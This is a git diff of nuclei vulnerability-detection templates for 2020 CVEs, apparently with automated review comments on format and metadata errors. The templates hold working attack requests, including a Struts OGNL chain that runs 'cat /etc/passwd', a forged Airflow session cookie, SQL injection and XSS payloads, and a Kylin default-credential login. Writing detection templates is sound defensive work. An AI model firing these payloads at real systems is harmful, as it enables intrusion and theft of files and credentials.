b/nuclei-templates/CVE-2020/CVE-2020-17526.yaml 
@@ -6,36 +6,49 @@ info: severity: high description: | Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized execution of arbitrary code. + remediation: Change default value for [webserver] secret_key config. reference: - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E - http://www.openwall.com/lists/oss-security/2020/12/21/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-17526 - remediation: Change default value for [webserver] secret_key config. + - https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-17526 cwe-id: CWE-287 + epss-score: 0.08372 + epss-percentile: 0.93787 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: apache + product: airflow fofa-query: Apache Airflow - verified: "true" tags: cve,cve2020,apache,airflow,auth-bypass -requests: +http: - raw: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} - - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY - req-condition: true matchers-condition: and matchers: + - type: dsl + dsl: + - "contains(body_1, 'Redirecting...')" + - "status_code_1 == 302" + condition: and + - type: word part: body_2 words: 
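Review bot: The second raw request in `@@ -6,36 +6,49 @@` sends a hard-coded `Cookie: session=.eJwl…` with no comment, and the only hint of what that value is lives in the `remediation:` line (`Change default value for [webserver] secret_key config`). A maintainer is likely to treat it as a stale fixture and regenerate it, which would silently break the check. Suggested comment directly above the `Cookie:` line: `# presumably a session cookie signed with Airflow's default [webserver] secret_key; reaching the admin page with it means the default key is still in use — do not regenerate`. The dsl matcher moved into this hunk (`status_code_1 == 302`) depends on the first request staying unauthenticated, which is worth stating in the same comment.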
@@ -45,11 +58,4 @@ requests: - "SLA Misses" - "Task Instances" condition: and - - - type: dsl - dsl: - - "contains(body_1, 'Redirecting...')" - - "status_code_1 == 302" - condition: and - -# Enhanced by md on 2022/10/19 +# digest: 4a0a00473045022100f9b0843697463f8e60b12ec56ef0932060ae2d860b8921f95740b592f274713f022053fcc5e9356e6480fab005b56bb10b6931ef145cd764ba9a91e7b44715fcb0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-17530.yaml b/nuclei-templates/CVE-2020/CVE-2020-17530.yaml index 6b3c814131..3e281da466 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-17530.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-17530.yaml 
@@ -1,30 +1,31 @@ id: CVE-2020-17530 + info: - name: Apache Struts 2.0.0-2.5.25 - Remote Code Execution + name: Apache Struts RCE author: pikpikcu severity: critical - description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it. reference: - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - http://jvn.jp/en/jp/JVN43969166/index.html - https://cwiki.apache.org/confluence/display/WW/S2-061 - https://security.netapp.com/advisory/ntap-20210115-0005/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-17530 + tags: cve,cve2020,apache,rce,struts + description: | + Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2020-17530 cwe-id: CWE-917 - tags: cve,cve2020,apache,rce,struts + requests: - method: GET path: - 
"{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - -# Enhanced by mp on 2022/04/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-18268.yaml b/nuclei-templates/CVE-2020/CVE-2020-18268.yaml new file mode 100644 index 0000000000..ba4395254f --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-18268.yaml 
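Review bot: The new side of `@@ -1,30 +1,31 @@` drops information the old side had: `name:` loses the affected range (`Apache Struts 2.0.0-2.5.25 - Remote Code Execution` becomes `Apache Struts RCE`), the reference `https://nvd.nist.gov/vuln/detail/CVE-2020-17530` is removed, and `cvss-score` changes from `9.8` to `9.80` — the opposite direction to what the same commit does for CVE-2020-17456. This looks like an older revision of the template overwriting a newer one rather than an update; the new `Affected software : Apache Struts 2.0.0 - Struts 2.5.25` sentence also has a stray space before the colon. I would keep the old `name:`, the NVD link and `cvss-score: 9.8`, and drop the blank line that is now the last line of the `info:` block before `requests:`.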
@@ -0,0 +1,50 @@
+id: CVE-2020-18268
+
+info:
+ name: Z-Blog <=1.5.2 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+ impact: |
+ An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks.
+ remediation: |
+ Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability.
+ reference:
+ - https://github.com/zblogcn/zblogphp/issues/216
+ - https://github.com/zblogcn/zblogphp/issues/209
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-18268
+ - https://github.com/ARPSyndicate/kenzer-templates
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-18268
+ cwe-id: CWE-601
+ epss-score: 0.00147
+ epss-percentile: 0.49792
+ cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: zblogcn
+ product: z-blogphp
+ tags: cve,cve2020,redirect,zblogphp,authenticated,zblogcn
+
+http:
+ - raw:
+ - |
+ POST /zb_system/cmd.php?act=verify HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 81
+ Content-Type: application/x-www-form-urlencoded
+ Connection: close
+
+ btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
+ - |
+ GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
+ Host: {{Hostname}}
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
+# digest:
4a0a00473045022100bd3922005e2f1f83e8fc6d03ed0821320876192c346fd423f1e365de6eecda67022007afefdc8787c536742bd021c8c77fecf9c9783282077289ed30c3e2ee522665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-19282.yaml b/nuclei-templates/CVE-2020/CVE-2020-19282.yaml deleted file mode 100644 index b89e24088b..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-19282.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2020-19282 -info: - name: Jeesns 1.4.2 XSS - author: pikpikcu - severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. - reference: - - https://github.com/zchuanzhao/jeesns/issues/11 - - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 - - https://www.seebug.org/vuldb/ssvid-97940 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-19282 - cwe-id: CWE-79 - tags: cve,cve2020,jeesns,xss -requests: - - method: GET - path: - - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2020/cve-2020-1938.yaml b/nuclei-templates/CVE-2020/CVE-2020-1938.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-1938.yaml rename to nuclei-templates/CVE-2020/CVE-2020-1938.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-19515.yaml b/nuclei-templates/CVE-2020/CVE-2020-19515.yaml index 6be6bcce80..cf7850d5de 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-19515.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-19515.yaml 
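Review bot: `Content-Length: 81` in the first raw request of `@@ -0,0 +1,50 @@` is a fixed value for a body whose length depends on `{{username}}` and `{{password}}`; as far as I know nuclei recomputes the header for raw requests unless `unsafe` is set, so the line is at best misleading and should be dropped. The second request is written as `HTTP/2` while the first uses `HTTP/1.1`; if that is not deliberate, `HTTP/1.1` keeps the two consistent. `atc=login` in that request line looks like a typo for `act=login` (the first request uses `act=verify`), but it should be confirmed against the referenced zblogphp issue before changing, since it may be the parameter the affected handler actually reads.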
@@ -6,6 +6,8 @@ info: severity: medium description: | qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2020-19515 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41374 + epss-percentile: 0.41242 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 - tags: cve,cve2020,xss,qdpm,unauth + tags: cve2020,cve,xss,qdpm,unauth http: - method: GET @@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f8cc92b579ee4fd8b503bcc9846cf6a25beb583f0d7ad885af5f875f4230b0fa02202a34c318390b57b32c65ce37a6dd2a1f8f9d1dfcac54f163c63d462ebe7b5b69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205447757079347b8070e89fe60975aa83c5f776a495770b9fe12acf27f046e0030220569d1f8e17b6d601ebb193264cb7fab1e1dea5fdb12a553bd34fd8f502786c21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-1956.yaml b/nuclei-templates/CVE-2020/CVE-2020-1956.yaml deleted file mode 100644 index 035b347767..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-1956.yaml +++ /dev/null 
@@ -1,27 +0,0 @@ -id: CVE-2020-1956 - -info: - name: Apache Kylin弱口令到rce - author: Str1am - severity: high - tags: Kylin,rce - -requests: - - raw: - - | - POST /kylin/api/user/authentication HTTP/1.1 - Host: {{Hostname}} - Pragma: no-cache - Accept: application/json, text/plain, */* - Authorization: Basic QURNSU46S1lMSU4= - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "userDetails" - part: body - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-19625.yaml b/nuclei-templates/CVE-2020/CVE-2020-19625.yaml new file mode 100644 index 0000000000..ba85b67fc6 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-19625.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-19625 +info: + name: Gridx 1.3 RCE + author: geeknik + description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. + reference: https://github.com/oria/gridx/issues/433 + severity: critical + tags: cve,cve2020,gridx,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-19625 + +requests: + - method: GET + path: + - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + extractors: + - type: regex + part: body + group: 1 + regex: + - '

PHP Version ([0-9.]+)<\/h1>' diff --git a/nuclei-templates/CVE-2020/CVE-2020-20285.yaml b/nuclei-templates/CVE-2020/CVE-2020-20285.yaml index 859834c7df..e7993a1d98 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-20285.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-20285.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md - https://nvd.nist.gov/vuln/detail/CVE-2020-20285 @@ -14,12 +18,18 @@ info: cvss-score: 5.4 cve-id: CVE-2020-20285 cwe-id: CWE-79 + epss-score: 0.0009 + epss-percentile: 0.37789 + cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: zzcms + product: zzcms fofa-query: zzcms - verified: "true" - tags: cve,cve2020,zzcms,xss + tags: cve2020,cve,zzcms,xss -requests: +http: - raw: - | GET /user/login.php HTTP/1.1 @@ -41,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/17 +# digest: 4a0a0047304502202c9b0b05dd0d5566e148b27219b5d138bebd927b962661d892abffc7ab6c129a022100c423a96886f0bd34eb700de5fdb5508c514ad9ab63c39a03069d86fa47b9139f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-20300.yaml b/nuclei-templates/CVE-2020/CVE-2020-20300.yaml index afad4d7ea2..a2a35f76f7 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-20300.yaml 
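Review bot: `CVE-2020-19625.yaml` (`@@ -0,0 +1,34 @@`) is added in the legacy template layout — `requests:` instead of `http:`, `cvss-score: 9.80`, `reference:` as a bare string rather than a list, no `cwe-id`, no `max-request` metadata and no trailing `# digest:` line — while every modified template in this commit is being converted to the `http:` form with a digest. `CVE-2020-20988.yaml` further down in the same commit has the same shape (`requests:`, `verified: "true"`, `cookie-reuse`/`req-condition`, no digest). Both look like stale copies being re-added; they should be brought in line with the converted templates (`http:`, `cvss-score: 9.8`, list-form `reference:`, `metadata.max-request`) and, if the digest is produced by tooling, regenerated before commit rather than left off.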
+++ b/nuclei-templates/CVE-2020/CVE-2020-20300.yaml @@ -5,21 +5,33 @@ info: author: pikpikcu severity: critical description: WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to a patched version of WeiPHP or apply the vendor-supplied patch to fix the SQL Injection vulnerability. reference: - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - https://nvd.nist.gov/vuln/detail/CVE-2020-20300 - https://github.com/Y4er/Y4er.com/blob/master/content/post/weiphp-exp-sql.md + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cwe-id: CWE-89 cve-id: CVE-2020-20300 + cwe-id: CWE-89 + epss-score: 0.20647 + epss-percentile: 0.96263 + cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: weiphp + product: weiphp shodan-query: http.html:"WeiPHP5.0" - verified: "true" - tags: weiphp,sql + tags: cve,cve2020,weiphp,sql,sqli -requests: +http: - method: POST path: - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ " @@ -34,5 +46,4 @@ requests: - type: status status: - 500 - -# Enhanced by mp on 2022/09/28 +# digest: 4b0a00483046022100d8797af312f8278f5b2970883e169d0005026e8cf66544ea1c56f941fa37a2ab022100f9e0d410a6eafe296be9a17b89b19819a22377b358619a3abc0d1ec6df6e69ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2020/cve-2020-2096.yaml b/nuclei-templates/CVE-2020/CVE-2020-2096.yaml
similarity index 100%
rename from nuclei-templates/CVE-2020/cve-2020-2096.yaml
rename to nuclei-templates/CVE-2020/CVE-2020-2096.yaml
diff --git a/nuclei-templates/CVE-2020/CVE-2020-20988.yaml b/nuclei-templates/CVE-2020/CVE-2020-20988.yaml
new file mode 100644
index 0000000000..3068593902
--- /dev/null
+++ b/nuclei-templates/CVE-2020/CVE-2020-20988.yaml
@@ -0,0 +1,43 @@
+id: CVE-2020-20988
+info:
+ name: DomainMOD 4.13.0 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via reporting/domains/cost-by-owner.php in "or Expiring Between" parameter.
+ reference:
+ - https://mycvee.blogspot.com/p/xss2.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2020-20988
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2020,domainmod,xss,authenticated
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /reporting/domains/cost-by-owner.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
+ cookie-reuse: true
+ req-condition: true
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(all_headers_2, "text/html")'
+ - 'contains(body_2, "value=\"\"/>")'
+ - 'contains(body_2, "DomainMOD")'
+ condition: and
diff --git a/nuclei-templates/CVE-2020/CVE-2020-21012.yaml b/nuclei-templates/CVE-2020/CVE-2020-21012.yaml
index 1b77bed559..f980c8c7c8 100644
--- a/nuclei-templates/CVE-2020/CVE-2020-21012.yaml
+++ b/nuclei-templates/CVE-2020/CVE-2020-21012.yaml
@@ -6,20 +6,31 @@ info: severity: critical description: | Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0. reference: - https://github.com/hitIer/web_test/tree/master/hotel - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html - https://nvd.nist.gov/vuln/detail/CVE-2020-21012 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-21012 cwe-id: CWE-89 + epss-score: 0.07235 + epss-percentile: 0.93887 + cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2020,hotel,sqli,unauth + verified: true + max-request: 1 + vendor: hotel_and_lodge_booking_management_system_project + product: hotel_and_lodge_booking_management_system + tags: cve,cve2020,hotel,sqli,unauth,hotel_and_lodge_booking_management_system_project -requests: +http: - raw: - | POST /forgot_password.php HTTP/1.1 
@@ -35,5 +46,4 @@ requests: - 'status_code == 200' - 'contains(body, "Hotel Booking System")' condition: and - -# Enhanced by md on 2022/12/08 +# digest: 4a0a00473045022100ea99d63de90c17ef69343663ae409245371b719ba54e6602d603d1104a3cad99022075d17848133ba876d97f93a848b051ebb60d538253ef1ba0dc3a1c8f0df532fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-2103.yaml b/nuclei-templates/CVE-2020/CVE-2020-2103.yaml deleted file mode 100644 index a8199bbc1a..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-2103.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2020-2103 - -info: - name: Diagnostic page exposed session cookies - severity: medium - author: c-sh0 - description: Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 - - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 - metadata: - shodan-query: http.favicon.hash:81586312 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.40 - cve-id: CVE-2020-2103 - cwe-id: CWE-200 - tags: cve,cve2020,jenkins - -requests: - - raw: - - | - GET {{BaseURL}}/whoAmI/ HTTP/1.1 - Host: {{Hostname}} - - - | - GET {{BaseURL}}/whoAmI/ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'text/html' - - 'x-jenkins' - condition: and - case-insensitive: true - - - type: word - part: body_2 - words: - - 'Cookie' - - 'SessionId: null' - condition: and - - extractors: - - type: kval - kval: - - x_jenkins \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-2199.yaml b/nuclei-templates/CVE-2020/CVE-2020-2199.yaml deleted file mode 100644 index a79aa5cb82..0000000000 
--- a/nuclei-templates/CVE-2020/CVE-2020-2199.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: CVE-2020-2199 -info: - name: Nexus Repository Manager RCE - author: medbsq - severity: high -#https://www.cvebase.com/cve/2020/10199 -requests: - - method: POST - path: - - "{{BaseURL}}/rest/beta/repositories/go/group" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Content-Type: application/json - body: "{\"name\": \"internal\",\"online\": true,\"storage\": {\"blobStoreName\": \"default\",\"strictContentTypeValidation\": true},\"group\": {\"memberNames\": [\"$\\c{ 1337 * 1337 }\"]}}" - matchers-condition: and - matchers: - - type: word - words: - - "1787569" - part: body - - type: status - status: - - 400 diff --git a/nuclei-templates/CVE-2020/CVE-2020-22208.yaml b/nuclei-templates/CVE-2020/CVE-2020-22208.yaml index ff8cb13e1b..f447227d0e 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-22208.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-22208.yaml 
@@ -1,44 +1,32 @@ id: CVE-2020-22208 - info: name: 74cms - ajax_street.php 'x' SQL Injection author: ritikchaddha severity: critical description: | SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. - impact: | - Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying database. - remediation: | - Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability. reference: - https://github.com/blindkey/cve_like/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2020-22208 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22208 + cve-id: CVE-2020-22210 cwe-id: CWE-89 - epss-score: 0.19578 - epss-percentile: 0.9585 - cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: 74cms - product: 74cms - shodan-query: http.html:"74cms" fofa-query: app="74cms" - tags: cve2020,cve,74cms,sqli + shodan-query: http.html:"74cms" + tags: cve,cve2020,74cms,sqli variables: num: "999999999" - -http: +requests: - method: GET path: - '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11�%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#' - matchers: - type: word part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100b445b86b8bc851dfc73d48b1385c99d7ad711230fa56e43efd02d7755d29ea84022100bfc90c7ba695df767a9f32c5eb3a29bf895e0af68b1d4c163438eaf8bfc221b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by cs on 2022/06/21 diff --git a/nuclei-templates/CVE-2020/CVE-2020-22210.yaml b/nuclei-templates/CVE-2020/CVE-2020-22210.yaml deleted file mode 100644 index 9ec069316e..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-22210.yaml +++ /dev/null 
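Review bot: The new side changes `cve-id: CVE-2020-22208` to `cve-id: CVE-2020-22210` inside a template whose `id:` and NVD reference are CVE-2020-22208, so the classification no longer matches the template; it should stay `cve-id: CVE-2020-22208`. The rest of this hunk reverts `http:` to the deprecated `requests:`, drops the `impact`, `remediation`, `epss-*`, `cpe`, `vendor`/`product` and `max-request` fields and replaces the `# digest:` trailer with the older `# Enhanced by cs on 2022/06/21` comment, which looks like an older copy of the file overwriting the newer one rather than an intentional edit, and this same commit deletes `CVE-2020-22210.yaml` in the next file section. The unchanged path line also contains a U+FFFD replacement character before `%27`; this may be a rendering artifact of the page, but if it is in the file the request no longer sends the original byte, so it is worth checking against the upstream template.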
@@ -1,26 +0,0 @@ -id: CVE-2020-22210 - -info: - author: princechaddha - name: 74cms Sql Injection - severity: high - tags: 74cms,sqli - description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-22210 - - https://github.com/blindkey/cve_like/issues/11 - classification: - cve-id: CVE-2020-22210 - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a' - - matchers: - - type: word - words: - - "e807f1fcf82d132f9bb018ca6738a19f" - part: body - -# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/CVE-2020/CVE-2020-22211.yaml b/nuclei-templates/CVE-2020/CVE-2020-22211.yaml index a303d4b08f..a711842702 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-22211.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-22211.yaml @@ -1,5 +1,4 @@ id: CVE-2020-22211 - info: name: 74cms - ajax_street.php 'key' SQL Injection author: ritikchaddha @@ -18,15 +17,12 @@ info: fofa-query: app="74cms" shodan-query: http.html:"74cms" tags: cve,cve2020,74cms,sqli - variables: num: "999999999" - requests: - method: GET path: - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' - matchers: - type: word part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-23015.yaml b/nuclei-templates/CVE-2020/CVE-2020-23015.yaml 